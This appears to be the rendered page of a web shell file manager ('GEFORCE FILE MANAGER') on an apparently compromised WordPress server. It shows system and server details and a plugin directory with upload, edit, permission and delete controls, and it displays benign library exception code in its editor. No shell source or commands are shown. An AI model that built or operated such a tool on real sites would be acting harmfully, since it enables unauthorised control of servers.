[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
wp-optimize
/
vendor
/
rosell-dk
/
webp-convert
/
src
/
Exceptions
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 InvalidInput
SET
[ DEL ]
📄 InvalidInputException.php
196 B
SET
[ EDIT ]
|
[ DEL ]
📄 SanityException.txt
196 B
SET
[ EDIT ]
|
[ DEL ]
📄 WebPConvertException.php
1,288 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: WebPConvertException.php
<?php namespace WebPConvert\Exceptions; /** * WebPConvertException is the base exception for all exceptions in this library. * * Note that the parameters for the constructor differs from that of the Exception class. * We do not use exception code here, but are instead allowing two version of the error message: * a short version and a long version. * The short version may not contain special characters or dynamic content. * The detailed version may. * If the detailed version isn't provided, getDetailedMessage will return the short version. * */ class WebPConvertException extends \Exception { public $description = ''; protected $detailedMessage; protected $shortMessage; public function getDetailedMessage() { return $this->detailedMessage; } public function getShortMessage() { return $this->shortMessage; } public function __construct($shortMessage = "", $detailedMessage = "", $previous = null) { $detailedMessage = ($detailedMessage != '') ? $detailedMessage : $shortMessage; $this->detailedMessage = $detailedMessage; $this->shortMessage = $shortMessage; parent::__construct( $detailedMessage, 0, $previous ); } }